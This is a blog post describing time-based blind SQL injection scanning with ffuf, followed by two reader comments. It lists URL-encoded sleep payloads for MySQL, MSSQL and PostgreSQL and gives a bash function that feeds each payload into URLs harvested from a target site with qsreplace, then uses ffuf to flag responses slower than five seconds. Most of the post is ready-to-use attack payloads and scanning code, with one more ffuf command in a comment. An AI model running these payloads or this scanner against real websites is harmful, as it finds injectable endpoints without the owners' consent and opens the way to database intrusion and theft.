You are currently viewing Time-Based SQL Injection with ffuf

Time-Based SQL Injection with ffuf

Tools

  • First we need latest version of go-lang install
  • ffuf | go get -u github.com/ffuf/ffuf
  • qsreplace | go get -u github.com/tomnomnom/qsreplace

PAYLOADS

XOR(if(now()=sysdate(),sleep(5),0))OR%27
if(now()=sysdate(),sleep(5),0)
(select(0)from(select(sleep(5)))v)/%27+(select(3)from(select(sleep(5)))v)+%27%22+(select(0)from(select(sleep(5)))v)+%22/
%27XOR(if(now()=sysdate(),sleep(51),0))XOR%27Z 1%20AND%20(SELECT%20%20FROM%20(SELECT(SLEEP(5)))YYYY)%20AND%20%27%%27=%27
1%27XOR(if(now()=sysdate(),sleep(5),0))OR%27
1%20AND%20(SELECT%201337%20FROM%20(SELECT(SLEEP(5)))YYYY)-1337
1%20or%20sleep(5)%23
%27%20WAITFOR%20DELAY%20%270:0:5%27–
%%27;SELECT%20PG_SLEEP(5)–
pg_sleep(5)
%27|%20|pg_sleep(5)–

ıllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıllııllıll lıllııllıllııllıllııllıllıılıllııllıllııllıllııllıllıılıllııllıllııllıllııllıllııll

Add-in .bashrc function

# Time Based Sql Injection
sqliTime()
{
for i in $(cat ~/.path/To/payloads) ; do
  cat $1 | qsreplace "$i" > sqli
  ffuf -u FUZZ -w sqli -s -ft "<5000" | tee -a vulnSqli.txt
  rm sqli
done
}

If you run this method every time or every new tab, You should enter,

source .bashrc

Example Usage:

You can use any of these tools gau, gauplus, or waybackurls to getting an URLs

After Collecting an URLs of targeted website

sqliTime urls
sqliTime urls.txt

Thanks for reading! I hope this helps, For more Tips & methodology Follow

↫↫↫↫↫☺HΛCKING☺↬↬↬↬↬

BOBBYTN

ℂ|𝔼ℍ𝕧𝟙𝟙 | 𝔹𝕦𝕘 𝕙𝕦𝕟𝕥𝕖𝕣 | ℂ𝕪𝕓𝕖𝕣 𝕊𝕖𝕔𝕦𝕣𝕚𝕥𝕪 ℝ𝕖𝕤𝕖𝕒𝕣𝕔𝕙𝕖𝕣 | 𝔼𝕥𝕙𝕚𝕔𝕒𝕝 ℍ𝕒𝕔𝕜𝕖𝕣 | 𝕄𝕒𝕤𝕥𝕖𝕣 𝕚𝕟 𝕊𝕠𝕔𝕚𝕒𝕝 𝔼𝕟𝕘𝕚𝕟𝕖𝕖𝕣𝕚𝕟𝕘...

This Post Has 2 Comments

  1. movieripps

    I just found your blog and I am loving the content!
    I really want to try this Blind SQLi technique using Fuff.

    What do you mean by this part??

    “If you run this method every time or every new tab, You should enter,

    source .bashrc”

  2. Salman

    ffuf -w “urls.txt:URL” -w timebased.txt -u URLFUZZ -ft “<5000”

    What about this?

Leave a Reply